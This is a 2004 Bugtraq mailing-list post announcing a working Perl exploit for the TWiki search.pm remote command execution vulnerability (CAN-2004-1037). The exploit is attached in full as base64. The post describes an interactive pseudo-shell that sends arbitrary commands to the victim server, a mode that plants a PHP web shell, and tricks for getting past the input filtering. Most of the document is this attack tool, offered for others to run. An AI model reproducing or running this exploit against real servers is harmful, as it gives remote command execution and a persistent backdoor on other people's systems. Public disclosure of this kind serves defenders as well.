[37431] in bugtraq
TWiki exploit (search.pm / CAN-2004-1037)
daemon@ATHENA.MIT.EDU (Roman Medina-Heigl Hernandez)
Sat Nov 20 01:32:07 2004
From: Roman Medina-Heigl Hernandez <roman@rs-labs.com>
To: bugtraq@securityfocus.com
Date: Fri, 19 Nov 2004 21:12:00 +0100
Message-ID: <oqksp0t5ra56f6bat7nd9nvvk62jdpcf9i@4ax.com>
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="--=_gsksp0t7aepevf0k105bbpnq2q4vccems3.MFSBCHJLHS"
----=_gsksp0t7aepevf0k105bbpnq2q4vccems3.MFSBCHJLHS
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: quoted-printable
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Hi Bugtraqers,
I discovered the recently published vulnerability in TWiki (read more =
about
it on [1]) and coded a simple working exploit some time ago. It is =
attached
here or you can download it from [2].
The exploit is written in Perl and has been tested on both Linux and =
Win32.
Run with no arguments to see supported options. It's beta but it works
(against TWiki "BeijingRelease" [3]; I did a quick test against "Cairo-
Release" [4] and it didn't work for it).
In a normal run, it will open what I call a "pseudo-shell". It isn't =
really
a shell; each command that we enter is sent independently to the victim =
server
in a GET or POST request (yes, it works on POST, too) and HTTP response =
will
be parsed so only the result of the command will be showed (well, there =
are
some cases where it could fail). The second mode of operation is to =
create a
PHPShell for you; then you can use it to run arbitrary commands =
(web-server
must support PHP in this last case).
Please note that in pseudo-shell mode, some characters (like ">") are not
allowed because they are filtered by TWiki code. You can bypass this =
behaviour
by using some tricks or use the PHP-shell mode, where you don't have any
restriction. For instance, in pseudo-shell mode, this won't work:
"echo hi > /tmp/greetz". But you can use something like:
"echo hi | tee /tmp/greetz", which is quite similar and _do_ work. =
Another
way to bypass char restrictions is to invoke perl (read exploit code; =
I've
used this trick to run the command that will create the file containing
PHPShell). There are more ways, only be creative.
I was in the process of adding a third method (a Win32/Unix compatible =
connect
back shell) but I didn't have time to finish it. I'm still very busy so =
this
feature will have to wait for some time (it is not easy to bypass some =
short-
comings in ActivePerl).
Btw, exploit has proxy support (with or without auth), basic HTTP auth =
and
you can run against HTTP or HTTPS servers. Give it a try! :-)
References:
[1] http://www.rs-labs.com/noticias/the_true_story_of_TWiki_vuln.txt
[2] http://www.rs-labs.com/exploitsntools/tweaky.pl
[3] http://twiki.org/cgi-bin/view/Codev/TWikiRelease01Feb2003
[4] http://twiki.org/cgi-bin/view/Codev/TWikiRelease01Sep2004
Regards,
--Roman
- --
PGP Fingerprint:
09BB EFCD 21ED 4E79 25FB 29E1 E47F 8A7D EAD5 6742
[Key ID: 0xEAD56742. Available at KeyServ]
-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 6.5.8 for non-commercial use <http://www.pgp.com>
iQA/AwUBQZ5DvuR/in3q1WdCEQIIrQCg4ERhNp4SDwHOAj3k9z9m1n8tYVcAn0D3
o5RLsw/e4c6XgVgGuM99haTa
=3DninJ
-----END PGP SIGNATURE-----
----=_gsksp0t7aepevf0k105bbpnq2q4vccems3.MFSBCHJLHS
Content-Type: application/octet-stream; name=tweaky.pl
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename=tweaky.pl
IyEvdXNyL2Jpbi9wZXJsDQoNCiMgInR3ZWFreS5wbCIgdi4gMS4wIGJldGEgMg0KIw0KIyBQcm9v
ZiBvZiBjb25jZXB0IGZvciBUV2lraSB2dWxuZXJhYmlsaXR5LiBSZW1vdGUgY29kZSBleGVjdXRp
b24NCiMgVnVsbiBkaXNjb3ZlcmVkLCByZXNlYXJjaGVkIGFuZCBleHBsb2l0ZWQgYnkgUm9NYU5T
b0Z0IDxyb21hbkBycy1sYWJzLmNvbT4NCiMNCiMgTWFkcmlkLCAzMC5TZXAuMjAwNC4NCg0KDQpy
ZXF1aXJlIExXUDo6VXNlckFnZW50Ow0KdXNlIEdldG9wdDo6TG9uZzsNCg0KIyMjIERlZmF1bHQg
Y29uZmlnDQokaG9zdCA9ICcnOw0KJHBhdGggPSAnL2NnaS1iaW4vdHdpa2kvc2VhcmNoL01haW4v
JzsNCiRzZWN1cmUgPSAwOw0KJGdldCA9IDA7DQokcG9zdCA9IDA7DQokcGhwc2hlbGxwYXRoPScn
Ow0KJGNyZWF0ZXBocHNoZWxsID0gJyhlY2hvIGBwZXJsIC1lIFwncHJpbnQgY2hyKDYwKS5jaHIo
NjMpXCdgIDsgZWNobyBcJyRvdXQgPSBzaGVsbF9leGVjKCRfR0VUWyJjbWQiXS4iIDJcJ2BwZXJs
IC1lIFwncHJpbnQgY2hyKDYyKS5jaHIoMzgpXCdgXCcxIik7XCcgOyBlY2hvIFwnZWNobyAiXCdg
cGVybCAtZSBcJ3ByaW50IGNocig2MCkuInByZSIuY2hyKDYyKS4iXFxcXCRvdXQiLmNocig2MCku
Ii9wcmUiLmNocig2MilcJ2BcJyI7XCcgOyBlY2hvIGBwZXJsIC1lIFwncHJpbnQgY2hyKDYzKS5j
aHIoNjIpXCdgKSB8IHRlZSAnOw0KJGxvZ2ZpbGUgPSAnJzsgICAgICMgSWYgZW1wdHksIGxvZ2dp
bmcgd2lsbCBiZSBkaXNhYmxlZA0KJHByb21wdCA9ICJ0d2Vha3lcJCAiOw0KJHVzZXJhZ2VudCA9
ICdNb3ppbGxhLzQuMCAoY29tcGF0aWJsZTsgTVNJRSA2LjA7IFdpbmRvd3MgTlQgNS4wKSc7DQok
cHJveHkgPSAnJzsNCiRwcm94eV91c2VyID0gJyc7DQokcHJveHlfcGFzcyA9ICcnOw0KJGJhc2lj
X2F1dGhfdXNlciA9ICcnOw0KJGJhc2ljX2F1dGhfcGFzcyA9ICcnOw0KJHRpbWVvdXQgPSAzMDsN
CiRkZWJ1ZyA9IDA7DQokaW5pdF9jb21tYW5kID0gJ3VuYW1lIC1hIDsgaWQnOw0KJHN0YXJ0X21h
cmsgPSAnQUFBQSc7DQokZW5kX21hcmsgPSAnQkJCQic7DQokcHJlX3N0cmluZyA9ICdub25leGlz
dGFudHR0dFwnIDsgKCc7DQokcG9zdF9zdHJpbmcgPSAnKSB8IHNlZCBcJ3MvXCguKlwpLycuJHN0
YXJ0X21hcmsuJ1wxJy4kZW5kX21hcmsuJy50eHQvXCcgOyBmZ3JlcCAtaSAtbCAtLSBcJ25vbmV4
aXN0YW50dHR0JzsNCiRkZWxpbV9zdGFydCA9ICc8Yj4nLiRzdGFydF9tYXJrOw0KJGRlbGltX2Vu
ZCA9ICRlbmRfbWFyay4nPC9iPic7DQoNCnByaW50ICJQcm9vZiBvZiBjb25jZXB0IGZvciBUV2lr
aSB2dWxuZXJhYmlsaXR5LiBSZW1vdGUgY29kZSBleGVjdXRpb24uXG4iOw0KcHJpbnQgIihjKSBS
b01hTlNvRnQsIDIwMDQuIDxyb21hblxAcnMtbGFicy5jb20+XG5cbiI7DQoNCiMjIyBVc2VyLXN1
cHBsaWVkIGNvbmZpZyAocmVhZCBmcm9tIHRoZSBjb21tYW5kLWxpbmUpDQokcGFyc2luZ19vayA9
IEdldE9wdGlvbnMgKCdob3N0PXMnID0+IFwkaG9zdCwNCiAgICAgICAgICAgICAgICAgICAgICAg
ICAgJ3BhdGg9cycgPT4gXCRwYXRoLA0KICAgICAgICAgICAgICAgICAgICAgICAgICAnc2VjdXJl
JyA9PiBcJHNlY3VyZSwNCiAgICAgICAgICAgICAgICAgICAgICAgICAgJ2dldCcgPT4gXCRnZXQs
DQogICAgICAgICAgICAgICAgICAgICAgICAgICdwb3N0JyA9PiBcJHBvc3QsDQogICAgICAgICAg
ICAgICAgICAgICAgICAgICdwaHBzaGVsbHBhdGg9cycgPT4gXCRwaHBzaGVsbHBhdGgsDQogICAg
ICAgICAgICAgICAgICAgICAgICAgICdsb2dmaWxlPXMnID0+IFwkbG9nZmlsZSwNCiAgICAgICAg
ICAgICAgICAgICAgICAgICAgJ2luaXRfY29tbWFuZD1zJyA9PiBcJGluaXRfY29tbWFuZCwNCiAg
ICAgICAgICAgICAgICAgICAgICAgICAgJ3VzZXJhZ2VudD1zJyA9PiBcJHVzZXJhZ2VudCwNCiAg
ICAgICAgICAgICAgICAgICAgICAgICAgJ3Byb3h5PXMnID0+IFwkcHJveHksDQogICAgICAgICAg
ICAgICAgICAgICAgICAgICdwcm94eV91c2VyPXMnID0+IFwkcHJveHlfdXNlciwNCiAgICAgICAg
ICAgICAgICAgICAgICAgICAgJ3Byb3h5X3Bhc3M9cycgPT4gXCRwcm94eV9wYXNzLA0KICAgICAg
ICAgICAgICAgICAgICAgICAgICAnYmFzaWNfYXV0aF91c2VyPXMnID0+IFwkYmFzaWNfYXV0aF91
c2VyLA0KICAgICAgICAgICAgICAgICAgICAgICAgICAnYmFzaWNfYXV0aF9wYXNzPXMnID0+IFwk
YmFzaWNfYXV0aF9wYXNzLA0KICAgICAgICAgICAgICAgICAgICAgICAgICAndGltZW91dD1pJyA9
PiBcJHRpbWVvdXQsDQogICAgICAgICAgICAgICAgICAgICAgICAgICdkZWJ1ZycgPT4gXCRkZWJ1
ZywNCiAgICAgICAgICAgICAgICAgICAgICAgICAgJ3N0YXJ0X21hcms9cycgPT4gXCRzdGFydF9t
YXJrLA0KICAgICAgICAgICAgICAgICAgICAgICAgICAnZW5kX21hcms9cycgPT4gXCRlbmRfbWFy
ayk7DQoNCiMjIyBTb21lIGJhc2ljIGNoZWNrcw0KJmJhbm5lciB1bmxlc3MgKCRwYXJzaW5nX29r
KTsNCg0KaWYgKCRnZXQgYW5kICRwb3N0KSB7DQogIHByaW50ICJDaG9vc2Ugb25lIG9ubHkgbWV0
aG9kISAoR0VUIG9yIFBPU1QpXG5cbiI7DQogICZiYW5uZXI7DQp9DQoNCmlmICghKCRnZXQgb3Ig
JHBvc3QpKSB7DQogICMgSWYgbm90IHNwZWNpZmllZCB3ZSBwcmVmZXIgUE9TVCBtZXRob2QNCiAg
JHBvc3QgPSAxOw0KfQ0KDQppZiAoISRob3N0KSB7DQogIHByaW50ICJZb3UgbXVzdCBzcGVjaWZ5
IGEgdGFyZ2V0IGhvc3RuYW1lISAodGlwOiAtLWhvc3QgPGhvc3RuYW1lPilcblxuIiA7DQogICZi
YW5uZXI7DQp9DQoNCiR1cmwgPSAoJHNlY3VyZSA/ICdodHRwcycgOiAnaHR0cCcpIC4gIjovLyIg
LiAkaG9zdCAuICRwYXRoOw0KDQojIyMgQ2hlY2tpbmcgZm9yIGEgdnVsbmVyYWJsZSBUV2lraQ0K
JnJ1bl9pdCAoJGluaXRfY29tbWFuZCwgJ1JTLUxhYnMgcmx6IScpOw0KDQojIyMgRXhlY3V0ZSBz
ZWxlY3RlZCBwYXlsb2FkDQoNCmlmICgkcGhwc2hlbGxwYXRoKSB7DQogICZjcmVhdGVfcGhwc2hl
bGw7DQogIHByaW50ICJQSFBTaGVsbCBjcmVhdGVkLiI7DQp9IGVsc2Ugew0KICAmcHNldWRvc2hl
bGw7DQp9DQoNCiMjIyBFbmQNCmV4aXQoMCk7DQoNCg0KIyMjIENyZWF0ZSBQSFBTaGVsbA0Kc3Vi
IGNyZWF0ZV9waHBzaGVsbCB7DQogICRjcmVhdGVwaHBzaGVsbCAuPSAkcGhwc2hlbGxwYXRoOw0K
ICAmcnVuX2l0KCRjcmVhdGVwaHBzaGVsbCwgJ3llYWghJyk7DQp9DQoNCg0KIyMjIFBzZXVkby1z
aGVsbA0Kc3ViIHBzZXVkb3NoZWxsIHsNCm9wZW4oTE9HRklMRSwgIj4+JGxvZ2ZpbGUiKSBpZiAk
bG9nZmlsZTsNCm9wZW4oU1RESU5QVVQsICctJyk7DQoNCnByaW50ICJXZWxjb21lIHRvIFJvTWFO
U29GdCdzIHBzZXVkby1pbnRlcmFjdGl2ZSBzaGVsbCA6LSlcbltUeXBlIEN0cmwtRCBvciAoYnll
LCBxdWl0LCBleGl0LCBsb2dvdXQpIHRvIGV4aXRdXG5cbiIuJHByb21wdC4kaW5pdF9jb21tYW5k
LiJcbiI7DQomcnVuX2l0ICgkaW5pdF9jb21tYW5kKTsNCnByaW50ICRwcm9tcHQ7DQoNCndoaWxl
ICg8U1RESU5QVVQ+KSB7DQogIGNob3A7DQogIGlmICgkXyBlcSAiYnllIiBvciAkXyBlcSAicXVp
dCIgb3IgJF8gZXEgImV4aXQiIG9yICRfIGVxICJsb2dvdXQiKSB7DQogICAgZXhpdCgxKTsNCiAg
fQ0KICANCiAgJnJ1bl9pdCAoJF8pIHVubGVzcyAhJF87DQogIHByaW50ICJcbiIuJHByb21wdDsN
Cn0NCg0KY2xvc2UoU1RESU5QVVQpOw0KY2xvc2UoTE9HRklMRSkgaWYgJGxvZ2ZpbGU7DQp9DQoN
Cg0KIyMjIFByaW50IGJhbm5lciBhbmQgZGllDQpzdWIgYmFubmVyIHsNCiAgcHJpbnQgIlN5bnRh
eDogLi90d2Vha3kucGwgLS1ob3N0PTxob3N0PiBbb3B0aW9uc11cblxuIjsNCiAgcHJpbnQgIlBy
b3h5IG9wdGlvbnM6ICAgICAgICAtLXByb3h5PWh0dHA6Ly9wcm94eTpwb3J0IC0tcHJveHlfdXNl
cj1mb28gLS1wcm94eV9wYXNzPWJhclxuIjsNCiAgcHJpbnQgIkJhc2ljIGF1dGggb3B0aW9uczog
ICAtLWJhc2ljX2F1dGhfdXNlcj1mb28gLS1iYXNpY19hdXRoX3Bhc3M9YmFyXG4iOw0KICBwcmlu
dCAiU2VjdXJlIEhUVFAgKEhUVFBTKTogIC0tc2VjdXJlXG4iOw0KICBwcmludCAiUGF0aCB0byBD
R0k6ICAgICAgICAgIC0tcGF0aD0kcGF0aFxuIjsNCiAgcHJpbnQgIk1ldGhvZDogICAgICAgICAg
ICAgICAtLWdldCB8IC0tcG9zdFxuIjsNCiAgcHJpbnQgIkVuYWJsZSBsb2dnaW5nOiAgICAgICAt
LWxvZ2ZpbGU9L3BhdGgvdG8vYS9maWxlXG4iOw0KICBwcmludCAiQ3JlYXRlIFBIUFNoZWxsOiAg
ICAgIC0tcGhwc2hlbGxwYXRoPS9wYXRoL3RvL3BocHNoZWxsXG4iOw0KICANCiAgZXhpdCgxKTsN
Cn0NCg0KDQojIyMgRXhlY3V0ZSBjb21tYW5kIHZpYSB2dWxuZXJhYmxlIENHSQ0Kc3ViIHJ1bl9p
dCB7DQogIG15ICgkY29tbWFuZCwgJHRlc3RpbmdfdnVsbikgPSBAXzsNCiAgbXkgJHJlcTsNCiAg
bXkgJHVhID0gbmV3IExXUDo6VXNlckFnZW50Ow0KICANCiAgJHVhLT5hZ2VudCgkdXNlcmFnZW50
KTsNCiAgJHVhLT50aW1lb3V0KCR0aW1lb3V0KTsNCiAgDQogICMgQnVpbGQgQ0dJIHBhcmFtIGFu
ZCB1cmxlbmNvZGUgaXQNCiAgbXkgJHNlYXJjaCA9ICRwcmVfc3RyaW5nIC4gJGNvbW1hbmQgLiAk
cG9zdF9zdHJpbmc7DQogICRzZWFyY2ggPX4gcy8oXFcpLyIlIiAuIHVucGFjaygiSDIiLCAkMSkv
Z2U7DQogIA0KICAjIENhc2UgR0VUDQogIGlmICgkZ2V0KSB7DQogICAgJHJlcSA9IEhUVFA6OlJl
cXVlc3QtPm5ldygnR0VUJywgJHVybCAuICI/c2NvcGU9dGV4dCZvcmRlcj1tb2RpZmllZCZzZWFy
Y2g9JHNlYXJjaCIpOw0KICB9DQoNCiAgIyBDYXNlIFBPU1QNCiAgaWYgKCRwb3N0KSB7DQogICAg
JHJlcSA9IG5ldyBIVFRQOjpSZXF1ZXN0IFBPU1QgPT4gJHVybDsNCiAgICAkcmVxLT5jb250ZW50
X3R5cGUoJ2FwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZCcpOw0KICAgICRyZXEtPmNv
bnRlbnQoInNjb3BlPXRleHQmb3JkZXI9bW9kaWZpZWQmc2VhcmNoPSRzZWFyY2giKTsNCiAgfQ0K
DQogICMgUHJveHkgZGVmaW5pdGlvbg0KICBpZiAoJHByb3h5KSB7DQogICAgaWYgKCRzZWN1cmUp
IHsNCiAgICAgICMgSFRUUFMgcmVxdWVzdA0KICAgICAgJEVOVntIVFRQU19QUk9YWX0gPSAkcHJv
eHk7DQogICAgICAkRU5We0hUVFBTX1BST1hZX1VTRVJOQU1FfSA9ICRwcm94eV91c2VyOw0KICAg
ICAgJEVOVntIVFRQU19QUk9YWV9QQVNTV09SRH0gPSAkcHJveHlfcGFzczsgICAgICANCiAgICB9
IGVsc2Ugew0KICAgICAgIyBIVFRQIHJlcXVlc3QNCiAgICAgICR1YS0+cHJveHkoWydodHRwJ10g
PT4gJHByb3h5KTsNCiAgICAgICRyZXEtPnByb3h5X2F1dGhvcml6YXRpb25fYmFzaWMoJHByb3h5
X3VzZXIsICRwcm94eV9wYXNzKTsgICAgICANCiAgICB9DQogIH0NCg0KICAjIEJhc2ljIEF1dGhv
cml6YXRpb24NCiAgJHJlcS0+YXV0aG9yaXphdGlvbl9iYXNpYygkYmFzaWNfYXV0aF91c2VyLCAk
YmFzaWNfYXV0aF9wYXNzKSBpZiAoJGJhc2ljX2F1dGhfdXNlcik7DQoNCiAgIyBMYXVuY2ggcmVx
dWVzdCBhbmQgcGFyc2UgcmVzdWx0cw0KICBteSAkcmVzID0gJHVhLT5yZXF1ZXN0KCRyZXEpOw0K
DQogIGlmICgkcmVzLT5pc19zdWNjZXNzKSB7DQogICAgCiAgICBwcmludCBMT0dGSUxFICJcbiIu
JHByb21wdC4kY29tbWFuZC4iXG4iIGlmICgkbG9nZmlsZSBhbmQgISR0ZXN0aW5nX3Z1bG4pOw0K
ICAgIEBjb250ZW50ID0gc3BsaXQoIlxuIiwgJHJlcy0+Y29udGVudCk7DQogICAgDQogICAgbXkg
JGVtcHR5X3Jlc3BvbnNlID0gMTsNCiAgICANCiAgICBmb3JlYWNoICRfIChAY29udGVudCkgew0K
ICAgICAgbXkgKCRtYXRjaCkgPSAoJF8gPX4gLyRkZWxpbV9zdGFydCguKikkZGVsaW1fZW5kL2cp
Ow0KICAgICAgDQogICAgICBpZiAoJGRlYnVnKSB7DQogICAgICAgIHByaW50ICRfIC4gIlxuIjsN
CiAgICAgIH0gZWxzZSB7DQogICAgICAJaWYgKCRtYXRjaCkgew0KICAgICAgCSAgJGVtcHR5X3Jl
c3BvbnNlID0gMDsNCiAgICAgIAkgIHByaW50ICRtYXRjaCAuICJcbiIgdW5sZXNzICgkdGVzdGlu
Z192dWxuKTsNCiAgICAgIAl9DQogICAgICB9DQogICAgICANCiAgICAgIHByaW50IExPR0ZJTEUg
JG1hdGNoIC4gIlxuIiBpZiAoJG1hdGNoIGFuZCAkbG9nZmlsZSBhbmQgISR0ZXN0aW5nX3Z1bG4p
Ow0KICAgIH0NCiAgICANCiAgICBpZiAoJGVtcHR5X3Jlc3BvbnNlKSB7DQogICAgICBpZiAoJHRl
c3RpbmdfdnVsbikgew0KICAgICAgZGllICJTb3JyeSwgZXhwbG9pdCBkaWRuJ3Qgd29yayFcblBl
cmhhcHMgVFdpa2kgaXMgcGF0Y2hlZCBvciB5b3Ugc3VwcGxpZWQgYSB3cm9uZyBVUkwgKHJlbWVt
YmVyIGl0IHNob3VsZCBwb2ludCB0byBUd2lraSdzIHNlYXJjaCBwYWdlKS5cbiI7DQogICAgICB9
IGVsc2Ugew0KICAgICAgICBwcmludCAiW1NlcnZlciBpc3N1ZWQgYW4gZW1wdHkgcmVzcG9uc2Uu
IFBlcmhhcHMgeW91IGVudGVyZWQgYSB3cm9uZyBjb21tYW5kP11cbiI7DQogICAgICB9DQogICAg
fQ0KICAgIA0KICB9IGVsc2Ugew0KICAgIGRpZSAiQ291bGRuJ3QgY29ubmVjdCB0byBzZXJ2ZXIu
IEVycm9yIG1lc3NhZ2UgZm9sbG93czpcbiIgLiAkcmVzLT5zdGF0dXNfbGluZSAuICJcbiI7DQog
IH0gDQp9DQo=
----=_gsksp0t7aepevf0k105bbpnq2q4vccems3.MFSBCHJLHS--
